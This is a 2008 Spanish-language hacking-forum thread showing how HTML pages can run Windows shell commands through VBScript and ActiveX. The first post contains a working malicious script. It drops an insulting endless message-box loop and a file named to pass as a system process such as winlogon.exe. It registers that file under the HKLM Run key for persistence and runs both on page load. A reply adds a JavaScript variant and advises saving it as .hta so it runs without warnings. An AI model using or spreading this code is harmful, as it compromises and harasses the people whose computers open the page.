elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Sigue las noticias más importantes de seguridad informática en el Twitter! de elhacker.NET


+  Foro de elhacker.net
|-+  Programación
| |-+  Scripting
| | |-+  Ejecutar lineas de batch desde codigo HTML |By-Skull|
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: Ejecutar lineas de batch desde codigo HTML |By-Skull|  (Leído 17,045 veces)
[SMT]

Desconectado Desconectado

Mensajes: 108

Phoenix Team Coder


Ver Perfil
Ejecutar lineas de batch desde codigo HTML |By-Skull|
« en: 9 Febrero 2008, 21:04 pm »

Bueno esta tecnica si es vieja!XD me la se desde el año pasado o mas creo yo, epro veo que no muchos la conocen asi que pues la enseño aqui, con esto pueden ejecutar sus codigos desde cualquier pagina que tenga e incluso pruebenlo, abren el notepad, ponen este code y lo guardan como html! ;)
 
                                                 CODIGO:



<!--aki esta el script k ace la magia, la parte k esta en rojo es en la k tienes k meter el codigo de lo k
 kieras ejecutar, cada linea del bat unela con "&"(sincomiyas)-->
<script language="vbs">
   on error resume next
   Set shell = createObject("Wscript.shell")

   shell.run("cmd.exe /c @echo off & color a & echo ola mundooooooooo......... & msg * holaaa & pause & exit")
   set fso=createObject("Scripting.fileSystemObject")
   set miArchivo = fso.CreateTextFile("\bUSik.vbs", 2, false)
   miArchivo.writeline("do" )
   miArchivo.writeline("msgbox(" & chr(34) & "eres una gorda" & chr(34) & ")" )
   miArchivo.writeline("loop" )
   miArchivo.Close
   if fso.getfile("\bUSik.vbs") = "" then
      wscript.popup("Permiso denegado, cierre la sesion e iniciela de nuevo como administrador")
   else
      randomize timer
      numer = int(rnd * 3)
      select case numer
      case 1
         nume="login32.exe"
      case 2
         nume="winlogon.exe"
      case 3
         nume="msagent.exe"
      case else
         nume="updater32.exe"
      end select
      set winDir=fso.GetSpecialFolder(0)
      set sysDir=fso.GetSpecialFolder(1)
      set vx = fso.CreateTextfile(windir & "\" & nume,2,false)
      vx.writeline("MZ")
      vx.Close
      shell.Regwrite "HKLM\Software\Microsoft\Windows\CurrentVersion\Run\Winlogon", winDir & "\" & nume
      shell.run("wscript " & windir & "\" & nume)
      shell.run("wscript \bUSik.vbs")
   end if
</script>
<!--esta parte ace k se cierre la ventana del IE-->
<script language="javascript">
   close();
</script>

</html>

Bueno este code es viejo y lo tenia guardado en un .txt de mi pcXD ni me acuerdo cuando lo hice o de donde lo saque! :P pero la parte roja es el de la SHELL (cmd)
bueno no recuerdo bien pero el code que lo hace funcionar es asi:

enseño aqui, con esto pueden ejecutar sus codigos desde cualquier pagina que tenga e incluso pruebenlo, abren el notepad, ponen este code y lo guardan como html! ;)
 
                                                 CODIGO:



<script language="vbs">
   on error resume next
   Set shell = createObject("Wscript.shell")

   shell.run("cmd.exe /c @echo off & color a & echo ohola el mioooo & msg * holaa & pause & exit")
</script>

pues si tiene error avisenme llevo años que no pruebo esta tecnica, y no se si es asi!
Una cosa IMPORTANTE, NO ejecuten el code que les deje arriba! ;) osea el primero ya el segundo si peuden e saquen variasiones! ;)

Salu2's! cool


« Última modificación: 21 Abril 2008, 04:14 am por skullmaster123 » En línea

Stacker

Desconectado Desconectado

Mensajes: 87



Ver Perfil
Re: Ejecutar lineas de batch desde codigo HTML |By-Skull|
« Respuesta #1 en: 15 Febrero 2008, 17:01 pm »

Gracias, en javascript:

Código:
<script language="javascript">
   var shell = new ActiveXObject("Wscript.shell")
   shell.run("cmd.exe /c @echo off & color a & echo ohola el mioooo & msg * holaa & pause & exit")
</script>

En navegadores, solo he conseguido que funcione en Internet Explorer, pero no en Firefox ni Opera.

Como siempre funciona, y sin confirmar con ningún mensaje de advertencia, es guardándolo como *.hta.

Gracias de nuevo por el código.

Saludos


En línea

Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
que es mejor, escribir codigo html desde un echo o html solo
Desarrollo Web
morenochico 1 4,554 Último mensaje 14 Febrero 2011, 19:10 pm
por ~ Yoya ~
Leer codigo HTML desde internet api Wininet
Programación C/C++
Riki_89D 2 3,596 Último mensaje 28 Mayo 2011, 22:04 pm
por kiriost
Ejecutar lineas de batch desde C++
Programación C/C++
kamykaze 5 7,127 Último mensaje 29 Abril 2013, 00:13 am
por daryo
Ejecutar un bat desde java y que el codigo no continue
Java
Mine Sweeper 2 6,057 Último mensaje 10 Julio 2013, 19:25 pm
por Mine Sweeper
Ejecutar vbscript código desde un html
Análisis y Diseño de Malware
Borito30 1 2,883 Último mensaje 14 Febrero 2017, 23:50 pm
por engel lex
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines